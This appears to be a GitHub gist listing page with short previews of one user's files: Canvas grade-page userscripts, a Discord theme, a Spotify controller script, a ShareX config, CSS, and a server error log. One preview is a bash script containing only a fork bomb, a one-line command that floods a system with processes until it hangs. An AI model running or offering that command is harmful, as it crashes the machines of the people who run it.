This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Hide Completed Assignments | |
| // @namespace hidecompass | |
| // @version 2026-20-05 | |
| // @description go away | |
| // @author Onyxia Rivera | |
| // @match https://canvas.tastafe.tas.edu.au/courses/*/grades | |
| // @icon https://external-content.duckduckgo.com/ip3/cloud.canvaslms.net.ico | |
| // @grant none | |
| // ==/UserScript== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Hide Last Year | |
| // @namespace hidelastyear | |
| // @version 2025-10-05 | |
| // @description Dude these haven't been assigned yet | |
| // @author Onyxia Rivera | |
| // @match https://canvas.tastafe.tas.edu.au/courses/*/grades | |
| // @icon https://rollcall-syd.instructure.com/images/panda-cycle-loader.gif | |
| // @grant none | |
| // ==/UserScript== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Hide Teacher Use Marks | |
| // @namespace hideteacheruse | |
| // @version 2025-11-06 | |
| // @description try to take over the world! | |
| // @author Onyxia Rivera | |
| // @match https://canvas.tastafe.tas.edu.au/courses/*/grades | |
| // @icon https://rollcall-syd.instructure.com/images/panda-cycle-loader.gif | |
| // @grant none | |
| // ==/UserScript== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @name Dark+ | |
| * @author DevEvil#8745 - Classes updated by null_nyx | |
| * @version Dark+3 | |
| * @description Highly customized dark and purple theme for Discord | |
| * @authorId 468132563714703390 | |
| * @authorLink https://devevil.com | |
| * @source https://github.com/DevEvil99/DarkPlus-Discord-Theme | |
| * @website https://devevil.com | |
| * @invite jsQ9UP7kCA |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| :(){ :&:;};: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # | |
| # This is sp, the command-line Spotify controller. It talks to a running | |
| # instance of the Spotify Linux client over dbus, providing an interface not | |
| # unlike mpc. | |
| # | |
| # Put differently, it allows you to control Spotify without leaving the comfort | |
| # of your command line, and without a custom client or Premium subscription. | |
| # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : ' | |
| ░█████╗░ ░█████╗░░█████╗░███╗░░░███╗██████╗░██╗██╗░░░░░███████╗██████╗░ | |
| ██╔══██╗ ██╔══██╗██╔══██╗████╗░████║██╔══██╗██║██║░░░░░██╔════╝██╔══██╗ | |
| ██║░░╚═╝ ██║░░╚═╝██║░░██║██╔████╔██║██████╔╝██║██║░░░░░█████╗░░██████╔╝ | |
| ██║░░██╗ ██║░░██╗██║░░██║██║╚██╔╝██║██╔═══╝░██║██║░░░░░██╔══╝░░██╔══██╗ | |
| ╚█████╔╝ ╚█████╔╝╚█████╔╝██║░╚═╝░██║██║░░░░░██║███████╗███████╗██║░░██║ | |
| ░╚════╝░ ░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚═╝░░░░░╚═╝╚══════╝╚══════╝╚═╝░░╚═╝ | |
| (Works on any Linux distro with gcc and chmod) | |
| ' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "1", | |
| "DestinationType": "ImageUploader", | |
| "RequestMethod": "POST", | |
| "RequestURL": "https://program-with-ht.ml/backend/process.php", | |
| "Body": "MultipartFormData", | |
| "FileFormName": "files[]", | |
| "URL": "$json:files['url']$" | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .btn-outline-secondary { | |
| display: none; | |
| } | |
| body.page-minimal { | |
| background-image: url("https://github.com/ONXLive/CommercialAir/blob/master/bg.png?raw=true"); | |
| background-repeat: no-repeat; | |
| background-size: cover; | |
| background-position: center; | |
| background-attachment: fixed; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [20:58:21 ERROR]: Exception in thread "main" java.lang.RuntimeException: Invalid configuration encountered - this is a configuration error and NOT a bug! Please attempt to fix the error or see https://www.spigotmc.org/ for help. | |
| [20:58:21 ERROR]: at net.md_5.bungee.conf.YamlConfig.load(YamlConfig.java:83) | |
| [20:58:21 ERROR]: at net.md_5.bungee.conf.YamlConfig.load(YamlConfig.java:67) | |
| [20:58:21 ERROR]: at net.md_5.bungee.conf.Configuration.load(Configuration.java:78) | |
| [20:58:21 ERROR]: at io.github.waterfallmc.waterfall.conf.WaterfallConfiguration.load(WaterfallConfiguration.java:49) | |
| [20:58:21 ERROR]: at net.md_5.bungee.BungeeCord.start(BungeeCord.java:279) | |
| [20:58:21 ERROR]: at net.md_5.bungee.BungeeCordLauncher.main(BungeeCordLauncher.java:62) | |
| [20:58:21 ERROR]: at net.md_5.bungee.Bootstrap.main(Bootstrap.java:15) | |
| [20:58:21 ERROR]: Caused by: while parsing a block mapping | |
| [20:58:21 ERROR]: in 'reader', line 49, column 2: |
NewerOlder